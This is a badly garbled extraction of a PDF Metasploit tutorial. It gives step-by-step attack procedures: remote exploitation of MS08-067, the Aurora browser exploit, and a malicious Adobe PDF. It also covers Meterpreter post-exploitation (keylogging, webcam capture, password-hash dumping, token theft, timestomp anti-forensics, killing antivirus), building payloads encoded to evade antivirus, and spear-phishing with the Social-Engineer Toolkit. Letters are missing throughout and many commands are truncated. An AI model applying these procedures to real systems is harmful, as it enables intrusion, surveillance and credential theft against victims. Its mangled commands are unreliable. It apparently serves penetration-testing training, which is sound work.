Download - Met as Ploit Guide
-
8/20/2019 Met as Ploit Guide
1/92
Metasploit Guide
Table of Contents
1.Introduction about Metasploit
2.Metasploit Basics
3.Information Gathering
4.Eploitation
!.Introduction about Meterpreter
".#ost Eploitaton using Meterpreter
$.Metasploit %tilities
&.Meterpreter 'cripting
(.Client 'ide Eploitation
1).'ocial Engineering Tool*it+'ET,
11.-uiliar module
12./inu eploitation
-ttribution
1.http0.offensiesecurit.commetasploitunleashedMain5#age
2.http0.securittube.net
3.http0.metasploit.com
4.http0en.i*ipedia.org
!.6arious blogs and ethical hac*ing ebsites
7ote0This document as solel made for educational purposes .#lease do
not use these methods for an *ind of malicious actiities or purposes
+Intentional or %nintentional,.
http://www.offensive-security.com/metasploit-unleashed/Main_Pagehttp://www.securitytube.net/http://www.metasploit.com/http://en.wikipedia.org/http://www.securitytube.net/http://www.metasploit.com/http://en.wikipedia.org/http://www.offensive-security.com/metasploit-unleashed/Main_Page
-
8/20/2019 Met as Ploit Guide
2/92
Chapter 8ne
Introduction about Metasploit
Metasploit is an open source computer securit pro9ect.Metasploit is not a single
tool:it is a frameor* hich is used for deeloping and eecuting eploit code against the
;emote target.%sing Metasploit e can eploit most of the ulnerabilities that eist in asoftare.
-
8/20/2019 Met as Ploit Guide
3/92
Metaspolit -rchitecture
/ibraries
1.;e 0 It is the basic librar for performing most tas*s.It handles soc*ets and differnet
tpes of protocols.
2.M'? Core 0It #roides the basic -#I.=efines the metasploit frameor*.
3.M'? Base0 It proides the friendl -#I.
#roides simplified -#Is for use in the frameor*
Modules0
#aload0 #aload is a piece of code that runs in the target sstem remotel.
Eploit 0 Eploit is a piece of softare:chun* of data or a se>uence of code that ta*es the
adantage of a bug of ulnerabilit.
-uiliar modules 0 This module is used for scanning :fuing and doing arious tas*s.
Encoder0- program hich encodes our paloads to aoid anti irus detection.
-
8/20/2019 Met as Ploit Guide
4/92
Interfaces0
Metasploit has different interfaces to ease our tas*s.@e can do a ariet of tas*s
ith these interfaces.
1.M'?Console 0This is the main interface e use throughout this document.open
terminal tpe msfconsole.Dou can get a indo li*e the belo screenshot.
Msfconsole eases all our tas*s compared to other interfaces.I ill eplain all the
commands hich e can use in msfconsole interface in the metasploit basics chapter.
-
8/20/2019 Met as Ploit Guide
5/92
2.M'?C/I
This is the sample usage of msfcli interface.msfcli gies more importance to scripting and
interpretabilit.It directl runs command line.It is a fantastic tool hen ou *no the
eact eploit and paload.
%sage0
open
1.Terminalmsfcli h
2.msfcli indossmbms)&5)"$5netapi 8
it displas arious options
3.msfcli indossmbms)&5)"$5netapi ;
-
8/20/2019 Met as Ploit Guide
6/92
3.-rmitage
-rmitage is the graphical G%I ersion for metasploit.It as deeloped b ;aphel
Mudge.In armitage e can open more than one terminal and search our eploits either
G%I or C%I at the same time.
%sage0
open
terminaltpe -rmitage
it ill displa the aboe indo.e can search our eploits using the attac*s tab and
search for the appropriate paloads for that eploit
The armitage indos belo displas metasploit C%I ersion and aboe G%I ersion
ou can ie ideo tutorials about armitage in the lin* belo.
http0.fastandeashac*ing.commanual
http://www.fastandeasyhacking.com/manualhttp://www.fastandeasyhacking.com/manual
-
8/20/2019 Met as Ploit Guide
7/92
4.M'?G%I0
It is better to use the msfconsole rather than other interfaces because it gie more poer
to our pentesting tas*s.
-
8/20/2019 Met as Ploit Guide
8/92
Metasploit Editions0
Metasploit proides a communit editon free of cost to eerone:the
remaining to editions cost more.Giant securit consulting firms are using epress andpro editions because those edtions are too costl.
-
8/20/2019 Met as Ploit Guide
9/92
Chapter To
Metasploit Basics
To become familiar ith the metasploit frameor* one should *no the basic
commands of metasploit.Metasploit commands are classified into 2 tpes
1.Core commands
2.=atabase commands
To open metasploit:open terminal tpe msfconsole.
1.Core commands
To open these commands tpe 8r tpe help in the metasploit console.7o i ill
eplain the important commands that ill help in the eploitation.
%seful commands
1,bac* 0 To come bac* from the current eploit or module
ou can see i am getting bac* from the eploit+ms1)5))25aurora, to msf main indo.
-
8/20/2019 Met as Ploit Guide
10/92
2,banner0 This command displas metasploit banner
3,connect 0This command is used to connect to the host.e should specif the host ip
address and port number along ith this command.
4,eit and >uit0 These commands are used to eit from metasploit and it comes to the
root.
!,irb0This command is used to drop a irb mode.%sing this mode one can rite ones on
rub scripts.
-
8/20/2019 Met as Ploit Guide
11/92
",info0This command displas the hole information about the selected eploit.
$,load0This command is used to load plugins into metasploit.
-
8/20/2019 Met as Ploit Guide
12/92
&,unload0This command is used to unload the loaded plugin from the frameor*.
(,search0This command is used to search a specific eploit or module.This command is
er useful to search an module.
1),resource0 This command is used to run specific commnads from a specified file.e
should gie the file path along iht this command.
11,use0This command is used to select a specific eploit.
12,ersion0This command ill displa the current ersion of metasploit.
To update metasploit tpe msfupdate in the console.
-
8/20/2019 Met as Ploit Guide
13/92
13,set and unset0 These commands set ariables.B using these commands e can set
our paloads and e can set ip address.
using unset e can unset the alue and e can gie the ne ipaddress.
14,setg and unsetg0These commands are used to set our ariable globall throught our
pentesting.
1!,sho 0This command is used to ie the options or modules.It is a er useful
command.
-
8/20/2019 Met as Ploit Guide
14/92
=atabase commands 0 =atabase commands are er useful to maintain huge data and
eport that data into files.@e can share data among our pentesting team and e can
collaborate that data.
B default:metasploit comes ith postgress database
-
8/20/2019 Met as Ploit Guide
15/92
1,db5connect0This command is used to connect to the database.The format to use this
command is db5connect username0passordJhostname0portnamedatabase
name.In m sstem m username passord are
db5connect msf304bfedfc2Jlocalhost0$33$msf3de
2,db5disconnect0 To disconnect from the database.
-
8/20/2019 Met as Ploit Guide
16/92
!,db5import0To import the files from arious softares li*e nessus and nepose.
",db5eport0To eport our results to other softares.
$,hosts0This command ill displa the connected hosts .
ou can use hosts c to filter the columns.
-
8/20/2019 Met as Ploit Guide
17/92
&,db5nmap0 7map is a er useful tool for pentester and netor* engineers.@e can do
man tas*s using nmap tool .
eg0db5nmap 8 1(2.1"&.21$.131.It displas the serices and operating sstem info.
(,serices0This command il displ the list of all serices running.
1),6ulns0It ill displa the ulnerabilities eisting in the ictim sstem.
-
8/20/2019 Met as Ploit Guide
18/92
Chapter Three
Informaiton gathering
If I had eight hours to chop don a tree: Id spend si hours sharpening m ae.
-braham /incoln
Information gathering is the first step in penetration testing.In this phase e
can gather as much information as possible about the target.The more information e
hae:the more is the chance of eploting.In this phase e can gather information li*e
ipaddress:serices if the target is a ebsite then e should gather sub
domains:emails:hosting serer and location of the serer inforamtion.
There are 2 tpes of information gathering
1,-ctie information gathering
2,#assie information gathering
#assie information gathering0 In this techni>ue e are not directl interacting ith
the target.e ill search information using hois and nsloo*up commands.There are
man tools aailable in Bac* Trac* to find the dns information.
7sloo*up0%sing nsloo*up e ill get the additional serer informaiton.
-
8/20/2019 Met as Ploit Guide
19/92
@hois 0This command is used to gather the subdomains informaiton and registrar name.
These are onl fe techni>ues discussed.There are man more to gather information in a
passie a.
-ctie information gathering0
In actie informaiton gathering e ill use a tool nmap+netor* mapper, :
ritten b Gordon fodor lon.It is a cross platform tool.
I ill eplain some basic nmap commands to scan our netor*.The boo*
7map coo*boo* the fat free guide for netor* scanning is highl recommended to
eplore much about 7map.
-
8/20/2019 Met as Ploit Guide
20/92
To scan a single ip address0e can use 7map to scan a single ip address.
usage0 nmap ip address
To scan multiple ip address
usage0 nmap 1(2.1"&.21$.131 1(2.1"&.21$.133
-
8/20/2019 Met as Ploit Guide
21/92
To scan entire subnet0
usage0 nmap 1(2.1"&.21$.13124
-danced scanning options0
7map has man adanced features to successfull gather more information
about the target.@e can scan tcp ports:udp ports and find the operating sstem and
ersion detection.
@e can perform null scan:-CK scan and trace route on the target.7map is li*e
a siss arm *nife.e can handle a ide ariet of securit testing and netor*administratie tas*s.
-
8/20/2019 Met as Ploit Guide
22/92
Tcp 'D7 scan0
@e can perform 'D7scan on the netor*.This scan is er stealth.It does not
open a full connection to the remote host.
usage0 nmap s' 1(2.1"&.21$.131
%=#+%ser =atagram #rotocol, scan0 @e can scan %=# ports of the target sstem.
usage 0nmap s% 1(2.1"&.21$.131
-
8/20/2019 Met as Ploit Guide
23/92
Tcp 7ull scan0
7o e are performing null scan to tric* the firealled sstem and to get
the response from that sstem.
%sage0 nmap s7 1(2.1"&.21$.131
8perating sstem and ersion detection
To find the operating sstem of the target e ill use 8 option.
%sage0 nmap 8 1(2.1"&.21$.131
-
8/20/2019 Met as Ploit Guide
24/92
To find the ersion detection0
%sing 7map e can find ersions of the serices running on the ports. @e il
use s6 option to do this.
%sage 0nmap s6 1(21.1"&.21$.131
Dou can combine bothe 8 and '6 options at a time
usage0 nmap 8 s6 1(2.1"&.21$.131
These are some nmap commands to find the target serices and open ports and
operating sstem info.There are man other adanced options that eist in nmap.I highl
recommend a boo* nmap coo*boo* to *no more about nmap and eplore man
options that eist nmap.
-
8/20/2019 Met as Ploit Guide
25/92
Chapter ?our
Eploitation
Eploitation is the meridian for eer securit engineer.It is a great feeling to
eploit a first machine and get full control oer that machine.Eploitation is a er
difficult tas* to accomplish.e need to *no much about the target.In this chapter i illsho ou adanced techni>ues to get shell on the target sstem and ou ill gain full
control oer the ictim sstem.
Before reading this chapter please read chapter to to *no the basics of
metasploit.I am going to use the msfconsole throught out this chapter.
Basic eploitation0
I am going to use ms)&5)"$5netapi eploit.ou can get much information
about this eploit in the belo lin*.
http://www.metasploit.com/modules/exploit/windows/smb/ms08_067_netapi
Metasploit has a great feature tab completion.If e dont *no about
particular eploit press tab tice it to get some suggestions displaed.
Dou can see it displas arious eploits.8r ou can search for particular eploit using
search command.
http://www.metasploit.com/modules/exploit/windows/smb/ms08_067_netapihttp://www.metasploit.com/modules/exploit/windows/smb/ms08_067_netapi
-
8/20/2019 Met as Ploit Guide
26/92
'earch netapi0
%sage0 search eploit name
sho0 sho command is used to ie arious eploits:paloads:encoders .
%sage0 sho eploits:sho paloads: sho encoders.
'teps to eploit our first indos machine.
'tep 10 use eploitindossmbms)&5)"$5netapi.
'tep 20 sho options to ie arious options.
;
-
8/20/2019 Met as Ploit Guide
27/92
'tep 30 set ;
-
8/20/2019 Met as Ploit Guide
28/92
'etting a #aload0
%sage0 set #aload indosshellbind5tcp
'tep ! 0To get the shell on the target computer: use the command eploit.This command runsthe paload against the target sstem.Then ou ill get a remote shell on the target sstem.
%sage0 eploit.
-
8/20/2019 Met as Ploit Guide
29/92
?or confirmation: ou can chec* the ip address of the remote sstem 9ust b tping ipconfig
CongratulationsL ou hae eploited the our first indos machine.7o ou can create our
on folders and and run the files remotel on the target sstem.To gie more poer to
eploitation e illl user meterpreter paload.I ill disscuss this paload in later.
Commands used in this chapter
1,use eploitindossmbms)&5)"$5netapi To select a particular eploit
2,sho options To ie the options
3, set ;
-
8/20/2019 Met as Ploit Guide
30/92
Chapter ?ie
Introduction about Meterpreter
Meterpreter is the forerunner product in Metasploit frameor* hich is
leeraged as a paload after eploitation.Meterpreter is used to enhance the post
eploitation.
?eatures0
It does not create a ne process and completel resides in the memor.'o there is no
chance of detection.It does not rite an data on the dis*.-ll the communication from
the attac*er to the ictim is completel encrpted.It creates a separate channel to
encrpt the data.
Meterpreter has huge options to ease our post eploitation.@e can gain full control oerthe ictim sstem.
Eploitation using meterpreter 0
In this e follo the same procedure as the aboe eploitation:ecept
the paload.
-
8/20/2019 Met as Ploit Guide
31/92
'tep 3 0 'etting the meterpreter as palaod.
%sage0 'et paload indosmeterpreterbind5tcp
'tep 40 run eploit command.
-
8/20/2019 Met as Ploit Guide
32/92
Chapter 'i
#ost Eploitation using Meterpreter
@e can significantl improe the post eploitation using meterpreter.Man
of us thin*: getting shell on the target sstem is an important tas*:but to control our
target sstem is er important.@e can control our target etensiel b usingmeterpreter.Meterpreter is the etension to metasploit frameor* that allos us to
learage metasploits functionalit and further compromise our target.
@e can do man amaing tas*s using meterpreter paload li*e ebcam
snap shot:dumping hashes:monitoring *estro*es:donloading files from the target and
uploading files into the target and man more.Dou can see all those tas*s in this chapter.
?irst:e hae to compromise our target using meterpreter then e ill get
a meterpreter shell.?ollo the procedure in the aboe chapterIntroduction toMeterpreter to eploit the target.Meterpreter has a er huge command list: i ill tr
to coer (!N of commands in this chapter.#ractice all the commands hich i disscuss in
this chapter to become comfortable ith Meterpreter.
Meterpreter commands are diided into man sections depending upon
their usage.I ill discuss all the commands not in the same order: but in a random order :
depending upon the tas*.
1.Core commands
2.'tdapi 0'stem commands
3.'tdapi 0?ile stem commands
4.'tdapi 0%ser interface commands
!.'tdapi 07etor*ing commands
".pri commands
'ome of these commands are self eplanator: ou can easil understand
those commands b reading the description.I ill leae those commands as an eercise
to ou.I ill highl recommend ou to read the boo* Introduction to the commandline+'econd Edition,0The fat free guide to %ni and /inu Commands to become familiar
in linu 8perating sstem.This boo* gies ou a good *noledge on linu commands and
ho to use them efficientl.
-
8/20/2019 Met as Ploit Guide
33/92
1, Core commands0
2, 'stem Commands0
-
8/20/2019 Met as Ploit Guide
34/92
3, ?ile sstem commands0
4, %ser interface and ebcam commands
-
8/20/2019 Met as Ploit Guide
35/92
!,7etor*ing commands0
",#ri commands
-
8/20/2019 Met as Ploit Guide
36/92
1,Core commands0Core commands are basic meterpreter commands.
1,Bac*ground0This commands are used to bac*ground a meterpreter session and e
ill come bac* to the eploit module.
To ie the aailable sessions sessions l
To interact ith the seesion e hae to use sessions i session ideg0 sessions i 1
2,bgrun0This command is used to eecute a meterpreter script as the bac*ground
process.
-
8/20/2019 Met as Ploit Guide
37/92
3,info0It gies the descriptiona about selected post eploitation module
%sage0 inof module name.
4,migrate0It migrates to another process.@e hae to migrate to another process because
the ictim might close the process hich meterpreter binds.'o e hae to migrate to
sstem processess.
%sage0 migrate process id
eg0migrate 12212
!,use 0 This command is used to load a particular etension into the frameor*.It is li*e
the load command in metasploit.
%sage0 use espia
-
8/20/2019 Met as Ploit Guide
38/92
", run0 This command is used to run a meterpreter script.
%sage0run script name
eg0 run chec*m
$,irb0This command is used to drop into a rub shell here e can create rub based
scripts.
&,Channel commands0Channels are er useful to eecute our commands on the target
sstem.The communication in the channels are encrpted.e can read:rite and interact
ith the channels.
To create a channel e hae to use eecute command.
%sage 0eecute f eplorer.ee c
-
8/20/2019 Met as Ploit Guide
39/92
channel l0 To ie the list of channels.
Channel 0To rite data into a particular channel e ill use this commnad.
%sage0 channel 2+1 is the channel number,
channel r 0To reda data from a particular channel.
%sage0 channel r 2
Interact0 This command is used to interact ith a particular channel
%sage0 interact 2
-
8/20/2019 Met as Ploit Guide
40/92
?ile sstem commands0
1,pd0It displas the print or*ing direcor and cd command is used to change the
director.
2,ls0 To list the files in a director.
-
8/20/2019 Met as Ploit Guide
41/92
3,cat0This command is used to read the contents in a file.In ls ou can find to files
namel credit card and email passord.I intentionall created them: to demonstrate
ho aful it is to sae confidentendial inforamation ithout encrpting.
'o do not sae our confidential information into tet files and do not rite passords
an here.If ou ant to rite:then encrpt those files.True encrpt is a good softareto encrpt an *ind of files.
-
8/20/2019 Met as Ploit Guide
42/92
4,donload0Dou can also donload those files using this command.
%sage 0 donlaod file path
eg0 donload c0OOcreditcard.tt
!,upload0Dou can upload our bac*doors into the target sstem.
%sage0 upload source destination
eg0 upload rootpaload.ee c0OO
-
8/20/2019 Met as Ploit Guide
43/92
'earch0This command is used to search files in a folder or drie.@e can also specif the
tpe of file to search eg. =oc:tt:pdf
%sage0 search d c0OO f P.tt r
m*dir:rmdir0 To ma*e a director e use m*dir command.To remoe a director e
use rmdir command.
%sage 0 m*dir *aleem
%sage0 rmdir *aleem
-
8/20/2019 Met as Ploit Guide
44/92
7etor*ing commands0
1,arp0 To displa the host arp cache and host information.
2,ipconfig0It used to displa the remote host ipaddress.
-
8/20/2019 Met as Ploit Guide
45/92
7etstat0It is used to displa the netor* statistics.
;oute0It is used to displa the routing table information.This command is er useful in
pioting concept.
%sage 0route h
-
8/20/2019 Met as Ploit Guide
46/92
'stem commands0
ssinfo0This command is used to ie the target sstem information.
#s0This command is used to displa the process running in the target sstem.
getpid0This command is used to ie the current process .
getuid0This command is used to ie the current user.
-
8/20/2019 Met as Ploit Guide
47/92
;eboot0This command is used to reboot the our target sstem.
'hutdon0This command is used to shutdon the remote sstem.
'hell0This command is used to drop a shell in the remote sstem.
To*en impersonation0
To*en impersonation is a er important concept in meterpreter.@indos
to*en are 9ust li*e eb coo*ies. The are li*e temporar *es hich 9ust hold an ob9ect
securit inforamtion for the entire login that the do not hae to proide their
credentials each time hen accessing a file or an ob9ect.There are to tpes of to*ensaailable
1,=elegation to*en
2,impersonate to*en
1,=elegation to*en0=elegation to*ens are used for interactie login such as logging into
our indos machine and connceting to remote des*top.
2,Impersonate to*en0Impersonate to*ens are used for noninteractie logins li*e
connecting to a netor* drie.
To*ens can be aailabe to us untill reboot.@hen the user logsoff from the sstem:
delegation to*en became impesonate to*en but it has the all the rights 9ust li*e
delegation to*en.
@e ill use incognito etension to steal and impersonate indos to*en.Dou can find
much about to*en in belo pdf lin*.
http0labs.mrinfosecurit.comassets142mri5securitimplicationsofindos
accessto*ens52))&)414.pdf
?irst e hae to load incognito etension into our meterpreter.
http://labs.mwrinfosecurity.com/assets/142/mwri_security-implications-of-windows-access-tokens_2008-04-14.pdfhttp://labs.mwrinfosecurity.com/assets/142/mwri_security-implications-of-windows-access-tokens_2008-04-14.pdfhttp://labs.mwrinfosecurity.com/assets/142/mwri_security-implications-of-windows-access-tokens_2008-04-14.pdfhttp://labs.mwrinfosecurity.com/assets/142/mwri_security-implications-of-windows-access-tokens_2008-04-14.pdf
-
8/20/2019 Met as Ploit Guide
48/92
%sage0 use incognito
To ie aailabe to*ens ou can use belo command.
%sage0list5to*ens u
Dou can see 4 delegation to*ens and 1 impersonate to*en are aailabe .Quic*l chec*
ho e are using getuid command.
%sage0 getuid
7o I am logged as a 7T -%T
-
8/20/2019 Met as Ploit Guide
49/92
Impersonate0
Dou can see in delegation to*ens K-/EEM2$-12B=CO-=MI7I'T;-T8; to*en
aailabe.7o i am going to impersonate li*e that user.
%sage0 impersonate to*en nameeg0 impersonate K-/EEM2$-12B=COO-=MI7I'T;-T8;
Dou can see i impersonated as K-/EEM.ou can see user user id using getuid command.
'teal to*en0
Dou can steal to*en from other users.
%sage0 steal process id
eg0 steal 1234
drop to*en0
Dou can drop to*en to get bac*.Dou can see in the belo picute:first I impersonate
as *aleem and I used drop to*en command to get bac* to 7T -%T
-
8/20/2019 Met as Ploit Guide
50/92
re2self0
This command is also used to get bac* to the old user.
%sage0re2self
getpris0 This command is used to get all the aailable priileges on the ictim machine.
-
8/20/2019 Met as Ploit Guide
51/92
%ser interface and eb cam commands0
idletime0 This is used to ie ho long our ictim is aa from the sstem:meaning he
doesnot interact ith *eboard or mouse.
Kelogging0
-ll of us er are curious about hat the ictim is tping in his sstem and ho to
recored all those *estro*es.Metasploit deelopers hae done a great 9ob to rite an in
built *elogger.@e can monitor all the *estro*es tped b our ictim.
Ther are 3 commands aailable in meterpreter.
*escan5start0 To start a *elogger on the ictim machine.
*escan5dump0 To dump all the *estro*es tped b our ictim.
*escan5stop0To stop the *elogger on the ictims sstem.
I performed all these commands on m ictim machine+indos p,.Dou can ie themin the belo picture.
Een it can record alt:ctrl:shift all *es.It is a er poerful command.
-
8/20/2019 Met as Ploit Guide
52/92
%ictl0This command is used to control the ictims *eboard and mouse.@e can disable
their *eboard or mouse remotel.
%sage 0uictl enableOdisable *eboardOmouse.
'creenshot0
@e can grab screen shots of our ictims machine.@e can ie hat the ictim is
ieing.Dou can see m indos machine des*top here.
%sage0 screeenshot
-
8/20/2019 Met as Ploit Guide
53/92
@ebcam commands0
-nother interesting commands are ebcam commands.Dou can ie the ictim
remotel.I do not hae a ebcam in m laptop+i am using a prett old one,.Dou can tr
this command in our sstem.
There are to commands are aailable.
1,ebcam5list0 To ie list the list of ebcams.
%sage0ebcam5list
2,ebcam5snap0To ta*e the snap shot of our ictim.
%sage0ebcam5snap
I hae got an error because I do not hae a ebcam on m laptop.It ill or* if ou hae
one on ours.
#ri commands0
These commands are used to escalate priileges and to get all the aailable preileges on
the ictim machine.
Getsstem0 This command is used to get priileges on the ictim sstem.
%sage0 getsstem
hashdump0This command is used to dump all the hashed passords from the ictim
sstem.
Dou can use crac* the hashed passords using pseec eploit or 9tr5crac*5fast.
-
8/20/2019 Met as Ploit Guide
54/92
timestomp+anti forensic tool,0
@hen e are conducting a pentest on the ictims sstem:e ma access
their filesstem.If an forensic inestigation:the ill easil detect that the sstem has
been compromised.The best a to aoid forensic detection is not to access our ictims
file sstem.'o e ill use meterpreterIt completel resides in the memor and does notrite an data on the dis*.
-
8/20/2019 Met as Ploit Guide
55/92
'et the modificaiton time of a file0
@e can set the modification time of a file.To do this use m option.
%sage0timestomp path of the file m MM==DDDD
-
8/20/2019 Met as Ploit Guide
56/92
To displa M-C attributes0
%se option to displa all attributes.
%sage0timestomp path of the file
Eg0 timestomp c0OOcreditcard.tt
To set eisting file attributes0
@e can set alread eisting file attributes to a our specified file. To do this use
f option.In the belo eample i specified ntldr file attributes to m file.
%sage0 timestomp path of our file f path of eisting file
Eg0 timestomp c0OOcreditcard.tt f c0OOntldr
-
8/20/2019 Met as Ploit Guide
57/92
Chapter 'een
Metasploit %tilities
Metasploit comes ith to utilities to genearate shellcode and to eade anti
irus detection.%sing these utilities e can stealthil do the eploitation.
There are to tpes of utilities
1.Msfpaload
2.Msfencode
1.Msfpaload0
%sing msfpaload e can generate shellcode eecutables:and e can use that
shellcode outside the frameor*.@e can generate paload according to our format.e
can create C:;ub:Raascript and ee man tpes of formats.
'tep 10
%sage 0 msfpaload h
step 20To ie arious options to fill.
-
8/20/2019 Met as Ploit Guide
58/92
%sage0 msfpaload indosmeterpreterreerse5tcp 8
step 3
msfpaload indosmeterpreterreerse5tcp /
-
8/20/2019 Met as Ploit Guide
59/92
Msfencode0
The paload hich e hae generated using msfpaload is full functional and if
ictim scans ith the help of an antiirus:it could be detected.-ntiirus softares loo*
for signature to scan:so the shell code is detected b the antiirus.
To eade this : metasploit deelopers hae done a great 9ob to introduce a neutilit called msfencode.%sing this e can encode our shell code ith arious encoders to
bpass antiirus detection.
%sage 0msfencode h
There are different *ind of options aailable to use.
Important options
c means count ho man no. of times e are encoding
eg 0 c ! means i am encoding ! times.
e7ame of the encode e use
eg0 e &"alpha5upper o Gie out file name
eg0 o paload.ee
tTpe of format
eg0 t ra
8ption to gie alternatie templete.
Eg0 notepad.ee
*The gien temple opens and our paload runs in ne process.
Eg0 notepad.ee *
The ictim is shon the notepad hen he opens the file but that paload runs stealthilon the bac*ground.
-
8/20/2019 Met as Ploit Guide
60/92
/ist of msfencoders 0
%suage0 msfencode l
These are a list of aailable encoders .@e can encode our paload using an of
the aboe encoders to eade antiirus detection.
The er good encoder is shi*ata5ga5nai it is a polmorphic encoder.
-
8/20/2019 Met as Ploit Guide
61/92
'tep 3 0 Encoding iht msfencode
%sage0 msfpaload indosmeterpreterreerse5tcp /
-
8/20/2019 Met as Ploit Guide
62/92
Multi encoding ith msfencode
'tep 40
%sage0 msfpaload indosmeterpreterreerse5tcp /
-
8/20/2019 Met as Ploit Guide
63/92
Encoding ith Custom eecutabel templats
'tep !0 msfpaload indosmeterpreterreerse5tcp /
-
8/20/2019 Met as Ploit Guide
64/92
Chapter Eight
Meterpreter scripting
Meterpreter has man inbuilt scripts to complete our difficult tas* ith using
9ust a sample script.@e can create our on scirpts using rub language and run those
scripts after eploitation.
Dou can see sample scripts in the aboe picture.There are more than 2)) scripts aailable
in metasploit to do our post eploitation.7o i ill discuss some important scripts.
1.chec*m
2.credcollect
3.*elogrecorder
4.nc
!.ebcam".getcountermeasure
$.*illa
&.scraper
(.enum5firefo
1).file5collector
11.arp5scanner
12.gettelnet
13.hostedit
-
8/20/2019 Met as Ploit Guide
65/92
To eecute a particular script ou should use the run command along ith that
script name.
%sage0 run chec*m
1,chec*m 0This script is used to chec* target is runnig or irtual machine or not.
2,credcollect0This script is used to collect the hac*ed passords.
%suage 0run credcollect
3,*elogrecorder0 This script ill record all *estor*es hich has tped on the ictim
sstem.
-
8/20/2019 Met as Ploit Guide
66/92
4,nc0This script is er useful script.It gies remote des*top connect on the remote
sstem.ou can see m indos sstem here.
%sage 0 run nc
!,ebcam0This script automaticall sitches on the ebcam on the remote machine
and e can ie them remotel.
%sage0 run ebcam
",getcountermeasure0This script is a onderful script.It can bpass the
antiiruses:fireall:and intrusion detction sstem on the ictim machine.
-
8/20/2019 Met as Ploit Guide
67/92
$,*illa0This script *ills the antiirus on the ictim sstem.
%sage 0run *illa
&,'craper0This script is er hand.It ill donload all the sstem informtion and all the
registr information.
%sage 0 run scraper
-
8/20/2019 Met as Ploit Guide
68/92
(,enum5firefo0This script ill gather the stored passods and coo*ies in the firefo
broser on the ictims sstem.
%sage0 run enum5firefo
1),file5collector0This script is used to gather eisting files on the target sstem.@e cangather doc:pdf and tet files using this script.
I used man optins to search files: ou can see arious options using h option
d To search a particular direcotor
f To search a particular file tpe.
-
8/20/2019 Met as Ploit Guide
69/92
11,gettelnet0This script enables the telnet session on the remote pc.
%sage 0run gettelnet
12,arp5scanner0This script is used for pioting and portforard and e can enumerate
local interfaces using this script.
%sage 0 run arp5scanner
13,hostsedit0This script is used to edit host file into the remote sstem.
-
8/20/2019 Met as Ploit Guide
70/92
Chapter 7ine
Client 'ide Eploitation
Client side attac*s ere the net eolement of attac*s after netor* defense
became much robust.These attac*s target the softare hich is installed on the ictim
computer li*e brosers:pdf readers and M'ord readers.These softares are commonlinstalled on eer computer either it is an office computer or our personal computer.
These attac*s hae been bestselling because of lac* of aareness in the
people.In client side attac*s:the attac*er can send eploits using social engineering
techni>ues.The sstems hich open that file or malicious lin* sent b the attac*er ill be
compromised.
Countermeasures0
1.%pdate our antiirus and antispare softare.2.%pdate our operating sstem and eb brosers on a regular basis.
3.%pdate our pdf reader +eg abode:foit,:flash plaers+>uic*time:flash,:ord document
readers+M'ord,.
4.=o not isit atrocious ebsites.
!.=onload softares from genuine ebsites because some ebsites offer spare
softare.
".Moilla and chrome users can use securit addons li*e @8T+@eb 8f Trust,:7o'cript
and Better #riac.
Broser based eploits0In this module our main target is broser.7o i ill
demonstrate an infamous eploit -urora.
Internet eplorer -urora memor corruption0
In the ear 2)1) this eploit came into picture.
-
8/20/2019 Met as Ploit Guide
71/92
=emo Time
'tep10 use eploitindosbroserms1)5))25aurora
Tpe sho optionsto ie different options.e hae to set ';6
-
8/20/2019 Met as Ploit Guide
72/92
'tep 3
1,I am setting /
-
8/20/2019 Met as Ploit Guide
73/92
2.@hen i open that lin* -urora eploit start or*ing.
3.Dou can see m indos sstem has been compromised.
4.Dou are greeted ith meterpreter shell.
This eploit has been or*ing flalessl on internet eplorer " ersion. 'o it is better toupdate our broser.
-
8/20/2019 Met as Ploit Guide
74/92
?ile format eploits
?ile format eploits are ne generation eploits.In this method e ill send afile of tpe pdf:doc or lb file to the target.hen the target opens that file their sstem
gets compromised.
=emo Time 0-dobe util.printf+, Bufferoerflo ulnerabilit0
There is buffer oerflo ulnerabillit in adobe reader and adobe acrobat
reader ersion &.1.B creating a speciall crafted pdf e can eploit the target
sstem.Dou can read more about this ulnerabilit in the belo lin*.
http0.metasploit.commoduleseploitindosfileformatadobe5utilprintf
'tep 10 use eploitindosfileformatadobe5utilprintf
I am using adobe utilprintf eploit.Tpe sho options to ie different tpes of
options.
'tep 20Change the file name%sage0 set ?I/E7-ME boo*.pdf
http://www.metasploit.com/modules/exploit/windows/fileformat/adobe_utilprintfhttp://www.metasploit.com/modules/exploit/windows/fileformat/adobe_utilprintf
-
8/20/2019 Met as Ploit Guide
75/92
'tep 30 'et a meterpreter paload:and fill /
-
8/20/2019 Met as Ploit Guide
76/92
'tep !0
%sage 0 set /
-
8/20/2019 Met as Ploit Guide
77/92
Chapter Ten
'ocial Engineering Too*it+'ET,
'ocial engineering is the art of mainpulating people into performing actions or
diulging confidential information li*e passords.
'ET as deeloped b =aid Kennd using pthon language ith the help ofsecurit communit.The main aim of 'ET is to fill a gap in the penetration testing
communit and bring aarness about the social engineering attac*s.-n fireall or
netor* intrusion detection sstem cannot stop social engineering attac*s because in
social engineering :the ea*est lin* in the securit chain is human stupidit.
The attac*s built in this tool*it ere designed to attac* a person or an
organiation.This tool *it has different modules In this tutorial I ill perform spearphising
attac*.
'pearphising Module0
This module allos ou craft email messages and send them to a large number of
people or a single email address.In this attac* e ill perform fileformat eploits.@e ill
send an email to a person ith an attachement li*e adobe reader or ip file format.hen
the ictim clic*s on the attachment their sstem ill compromise.@e ill get a shell on
that sstem.
-
8/20/2019 Met as Ploit Guide
78/92
'teps0 cd pentesteploitssetU .set
'tep 20 Choose spearphising attac* ector.Dou can see arious other modules are also
aailable.Dou can tr all those b ourself.It is er eas to use social engineering
too*it.7o need to remember commands to use this tool*it. The G%I is er user friendl.
-
8/20/2019 Met as Ploit Guide
79/92
'tep 30 Choose perform mass email attac* option : it ill displa arious file format
eploits.
'tep 4 0@e are selecting adobe reader buffer oerflo ulnerabilit.Dou can see
diffenrent paloads hae generated according to our eploit.
'tep !0The paload has generated.7o choose first option to *eep the same file name or
else ou can use our preferable name.
-
8/20/2019 Met as Ploit Guide
80/92
-
8/20/2019 Met as Ploit Guide
81/92
'tep $0
-
8/20/2019 Met as Ploit Guide
82/92
'tep &0
-
8/20/2019 Met as Ploit Guide
83/92
Chapter Eleen
-uiliar Modules -uiliar module are not eploits.@hen e hear about metasploit e alas
thin* about ho to get a shell on a remote sstem.But in #entesting e hae to do man
tas*s li*e scanning the remote host:finding open ports :serer configuration and mis
configuration .
In metasploit frameor* e hae more than !") auiliar modules hich include
1, 'canners
2, ?uers
3,
-
8/20/2019 Met as Ploit Guide
84/92
#ortscanners0
